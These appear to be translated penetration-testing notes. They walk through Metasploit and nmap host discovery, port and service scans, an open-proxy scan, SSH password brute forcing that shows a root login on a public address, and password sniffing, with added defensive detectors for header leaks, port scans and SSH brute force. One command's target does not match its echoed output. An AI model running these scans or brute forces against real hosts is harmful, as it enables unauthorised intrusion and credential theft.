I. ICMP
msf > ping -c 5 www.qq.com
// Internet packet prober (ping): tests network connectivity
whatweb command (web fingerprinting):
[email protected]:~# whatweb www.mrliangqi.com
/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': iconv will be deprecated in the future, use String#encode instead.
http://www.mrliangqi.com [200] Adobe-Flash, Country[CHINA][CN], Email[[email protected]], HTML5, HTTPServer[nginx], IP[121.42.27.192], JQuery[3.0], PHP[5.3.27], Script, Title[%E6%8E%A7%E4%BC%81%E9%B9%85%E7%9A%84'Bolg| %E5%85%B3%E6%B3%A8%E4%BA%92%E8%81%94%E7%BD%91 | %E5%85%B3%E6%B3%A8%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8], UncommonHeaders[x-pingback], WordPress, X-Powered-By[PHP/5.3.27], X-UA-Compatible[IE=10], nginx, x-pingback[http://www.mrliangqi.com/xmlrpc.php]
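The whatweb output above is built almost entirely from response headers the server volunteers (X-Powered-By with an exact PHP version, x-pingback advertising the WordPress XML-RPC endpoint). The following audit script is an added example, not part of the original notes or of whatweb: it parses a raw HTTP response and reports the headers a defender would normally suppress. The response block, host name and header values are constructed for the example.

```python
import re

# Constructed raw HTTP response, modelled on the header fields whatweb reported
# above (nginx without a version, PHP/5.3.27, x-pingback). Not a real capture.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "X-Powered-By: PHP/5.3.27\r\n"
    "X-Pingback: http://blog.example.invalid/xmlrpc.php\r\n"
    "X-UA-Compatible: IE=10\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that exist mainly to announce the technology stack.
TECH_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)*")


def parse_response_headers(raw):
    """Split a raw HTTP response into (status line, {lowercased name: value}).

    Only the first occurrence of a repeated header is kept; that is enough
    for an audit of disclosure headers.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = lines[0]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # malformed header line, ignore
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), value.strip())
    return status, headers


def audit_headers(headers):
    """Return a list of (header, severity, message) findings.

    - an exact version string in a technology header is rated high
      (it lets a scanner match the host against known CVEs);
    - a technology name without a version (other than a bare Server
      product name) is rated low;
    - x-pingback is rated medium: it advertises xmlrpc.php, which is
      usually disabled when pingbacks are not used.
    """
    findings = []
    for name in TECH_HEADERS:
        value = headers.get(name)
        if value is None:
            continue
        if VERSION_RE.search(value):
            findings.append((name, "high", f"exact version disclosed: {value}"))
        elif name != "server":
            findings.append((name, "low", f"technology disclosed: {value}"))
    if "x-pingback" in headers:
        findings.append(("x-pingback", "medium",
                         "XML-RPC pingback endpoint advertised: " + headers["x-pingback"]))
    return findings


if __name__ == "__main__":
    status, hdrs = parse_response_headers(SAMPLE_RESPONSE)
    print(status)
    for header, severity, message in audit_headers(hdrs):
        print(f"[{severity}] {header}: {message}")
```

Against the constructed response this flags X-Powered-By (exact PHP version) and X-Pingback, and reports nothing for a bare "Server: nginx". The corresponding fixes are configuration, not code: server_tokens off in nginx, expose_php = Off in php.ini, and disabling XML-RPC in WordPress if pingbacks are not needed.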
MSF host discovery module
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
RHOSTS                      yes       The target address range or CIDR identifier
SHOST                       no        Source IP Address
SMAC                        no        Source MAC Address
THREADS    1                yes       The number of concurrent threads
TIMEOUT    5                yes       The number of seconds to wait for new data
msf auxiliary(arp_sweep) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(arp_sweep) > set ThREADS 50
ThREADS => 50
msf auxiliary(arp_sweep) > run
[*] 192.168.1.1 appears to be up (UNKNOWN).
[*] 192.168.1.10 appears to be up (UNKNOWN).
[*] 192.168.1.15 appears to be up (Wistron Neweb Corp.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
nmap -sn 192.168.1.0/24
// live host discovery (ping sweep, no port scan)
nmap -O 192.168.1.1
// detect the target host's operating system version
nmap -sS -Pn ip
// basic port scan
nmap -sV -Pn ip
// service version detection on the open ports
Common options:
-sT: TCP connect scan, similar to the tcp module in MSF
-sS: TCP SYN scan, similar to the syn module in MSF
-Pn: do not send an ICMP echo request before scanning to test whether the target is up
-O: enable TCP/IP stack fingerprinting to obtain the remote host's operating system type and related information
-F: fast scan, only the ports listed in nmap-services
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
SYN scanning (probing for open ports with TCP SYN-flagged packets) is generally recommended because it is fast, gives accurate results and is less likely to be noticed.
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(syn) > set threads 20
threads => 20
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80
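A SYN scan never completes the TCP handshake, so the probed services log nothing; what does see it is a gateway firewall or NetFlow collector that records the incoming SYNs. The following detector is an added example, not code from the original notes or from Metasploit: it reads iptables-style LOG lines and flags any source that hits many distinct destination ports within a short window, which is exactly the pattern the syn module above produces. The log lines, host names and thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed iptables-style LOG lines (not real traffic). 192.168.1.17 probes
# twelve ports on 192.168.1.1 within three seconds; 192.168.1.15 makes a few
# ordinary connections; one UDP line shows what the parser ignores.
SAMPLE_LOG = """\
Dec 11 23:40:01 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=21 WINDOW=1024 SYN URGP=0
Dec 11 23:40:01 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=22 WINDOW=1024 SYN URGP=0
Dec 11 23:40:01 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=23 WINDOW=1024 SYN URGP=0
Dec 11 23:40:02 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=25 WINDOW=1024 SYN URGP=0
Dec 11 23:40:02 gw kernel: IN=eth0 OUT= SRC=192.168.1.15 DST=192.168.1.1 PROTO=TCP SPT=52001 DPT=80 WINDOW=29200 SYN URGP=0
Dec 11 23:40:02 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=53 WINDOW=1024 SYN URGP=0
Dec 11 23:40:02 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=80 WINDOW=1024 SYN URGP=0
Dec 11 23:40:03 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=110 WINDOW=1024 SYN URGP=0
Dec 11 23:40:03 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=135 WINDOW=1024 SYN URGP=0
Dec 11 23:40:03 gw kernel: IN=eth0 OUT= SRC=192.168.1.15 DST=192.168.1.1 PROTO=TCP SPT=52002 DPT=443 WINDOW=29200 SYN URGP=0
Dec 11 23:40:03 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=139 WINDOW=1024 SYN URGP=0
Dec 11 23:40:04 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=143 WINDOW=1024 SYN URGP=0
Dec 11 23:40:04 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=443 WINDOW=1024 SYN URGP=0
Dec 11 23:40:04 gw kernel: IN=eth0 OUT= SRC=192.168.1.17 DST=192.168.1.1 PROTO=TCP SPT=41000 DPT=445 WINDOW=1024 SYN URGP=0
Dec 11 23:40:04 gw kernel: IN=eth0 OUT= SRC=192.168.1.15 DST=192.168.1.1 PROTO=UDP SPT=5353 DPT=5353
Dec 11 23:40:20 gw kernel: IN=eth0 OUT= SRC=192.168.1.15 DST=192.168.1.1 PROTO=TCP SPT=52003 DPT=80 WINDOW=29200 SYN URGP=0
"""

# Only TCP SYNs count: each one is a fresh connection attempt to a port.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+)\b.*\bSYN\b"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport) for a TCP SYN log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is
    # fine because only differences between timestamps are used.
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))


def detect_port_scans(log_text, window_seconds=10, port_threshold=10):
    """Map each source that touched >= port_threshold distinct ports inside a
    sliding window of window_seconds to the largest distinct-port count seen."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e[0])
    recent = defaultdict(deque)  # src -> deque of (timestamp, dport) inside the window
    alerts = {}
    for ts, src, dst, dpt in events:
        q = recent[src]
        q.append((ts, dpt))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        distinct = len({p for _, p in q})
        if distinct >= port_threshold:
            alerts[src] = max(distinct, alerts.get(src, 0))
    return alerts


if __name__ == "__main__":
    for src, ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {ports} distinct ports in window")
```

The window and threshold are tuning knobs: a busy web client legitimately opens 80 and 443, so the threshold sits well above that, while a scanner that lists hundreds of ports stands out within a second. Note that "less likely to be noticed" in the text above refers to service logs; at the network layer a SYN scan is the easiest kind to spot.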
------ Service scanning and enumeration ------
msf auxiliary(syn) > search name:_version
// list all service enumeration modules
Common network service scans
1. Telnet service scan
msf auxiliary(syn) > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 192.168.1.15
rhosts => 192.168.1.15
msf auxiliary(telnet_version) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2. SSH service scan
msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set rhosts 183.62.232.207
rhosts => 183.62.232.207
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
3. Oracle service enumeration module
msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > set threads 50
threads => 50
msf auxiliary(tnslsnr_version) > set rhosts 203.175.156.0/24
rhosts => 203.175.156.0/24
msf auxiliary(tnslsnr_version) > run
[*] Scanned 035 of 256 hosts (013% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 141 of 256 hosts (055% complete)
[*] Scanned 150 of 256 hosts (058% complete)
[*] Scanned 174 of 256 hosts (067% complete)
[*] Scanned 198 of 256 hosts (077% complete)
[*] Scanned 250 of 256 hosts (097% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
4. Open proxy detection and use
msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set site www.baidu.com
site => www.baidu.com
msf auxiliary(open_proxy) > set rhosts 24.25.24.1-24.25.26.254
rhosts => 24.25.24.1-24.25.26.254
msf auxiliary(open_proxy) > set multiports true
multiports => true
msf auxiliary(open_proxy) > set verify_connect true
verify_connect => true
msf auxiliary(open_proxy) > set threads 100
threads => 100
msf auxiliary(open_proxy) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
IV. Password guessing and sniffing
1. SSH password guessing
Prerequisite: a strong wordlist is the key; ideally a targeted one built with the help of social-engineering databases.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.1.1
rhosts => 183.62.232.207
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /words.txt
pass_file => /words.txt
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > run
[*] 183.62.232.207:22 SSH – Starting bruteforce
[+] 183.62.232.207:22 SSH – Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-194.el5xen #1 SMP Tue Mar 16 22:01:26 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.17:59831 -> 183.62.232.207:22) at 2014-12-11 23:44:55 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
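On the target, the ssh_login run above leaves a burst of "Failed password" lines from one source followed by an "Accepted password" for root. The following detector is an added example, not code from the original notes, Metasploit or OpenSSH: it reads sshd auth-log lines, raises a brute-force alert once a source accumulates enough failures in a window, and raises a higher-severity alert when a login from such a source then succeeds. The log lines, host names, addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth-log lines (not a real capture). 192.168.1.17 fails five
# times and then succeeds as root; 10.0.0.5 is a user who mistyped once.
SAMPLE_AUTH_LOG = """\
Dec 11 23:44:50 srv sshd[2201]: Failed password for root from 192.168.1.17 port 59801 ssh2
Dec 11 23:44:51 srv sshd[2203]: Failed password for root from 192.168.1.17 port 59805 ssh2
Dec 11 23:44:52 srv sshd[2207]: Failed password for alice from 10.0.0.5 port 40112 ssh2
Dec 11 23:44:52 srv sshd[2210]: Failed password for root from 192.168.1.17 port 59810 ssh2
Dec 11 23:44:53 srv sshd[2215]: Failed password for invalid user admin from 192.168.1.17 port 59814 ssh2
Dec 11 23:44:54 srv sshd[2219]: Failed password for root from 192.168.1.17 port 59820 ssh2
Dec 11 23:44:55 srv sshd[2224]: Accepted password for root from 192.168.1.17 port 59831 ssh2
Dec 11 23:44:58 srv sshd[2230]: Accepted password for alice from 10.0.0.5 port 40118 ssh2
Dec 11 23:45:10 srv sshd[2240]: Accepted publickey for bob from 10.0.0.7 port 50001 ssh2: RSA SHA256:constructed-fingerprint
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2"
)


def parse_auth_line(line):
    """Return (timestamp, result, method, user, src) for an sshd auth line, else None."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year defaults to 1900; only deltas matter
    return ts, m.group("result"), m.group("method"), m.group("user"), m.group("src")


def detect_ssh_bruteforce(log_text, window_seconds=60, failure_threshold=5):
    """Return a list of alert dicts.

    'bruteforce': a source reached failure_threshold failures inside the window
    (reported once per source). 'bruteforce_success': a login was accepted from
    a source that still has >= failure_threshold failures inside the window.
    """
    failures = defaultdict(deque)  # src -> deque of (timestamp, user) inside the window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_auth_line(line)
        if not ev:
            continue
        ts, result, method, user, src = ev
        q = failures[src]
        while q and (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if result == "Failed":
            q.append((ts, user))
            if len(q) >= failure_threshold and src not in alerted:
                alerted.add(src)
                alerts.append({"type": "bruteforce", "src": src, "failures": len(q),
                               "users": sorted({u for _, u in q})})
        elif len(q) >= failure_threshold:
            alerts.append({"type": "bruteforce_success", "src": src, "user": user,
                           "method": method, "failures_before": len(q)})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert type is the one worth paging on: a password login for root that follows a run of failures from the same address is the signature of a successful guess. The module's threads setting (50 above) also means many parallel connections per second from one source, which sshd's MaxStartups and a reactive blocker such as fail2ban both respond to; disabling password authentication for root (PermitRootLogin prohibit-password) removes the outcome shown in the transcript entirely.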
2. psnuffle password sniffing
msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
msf auxiliary(psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb…
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb…
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb…
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb…
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb…
[*] Sniffing traffic…..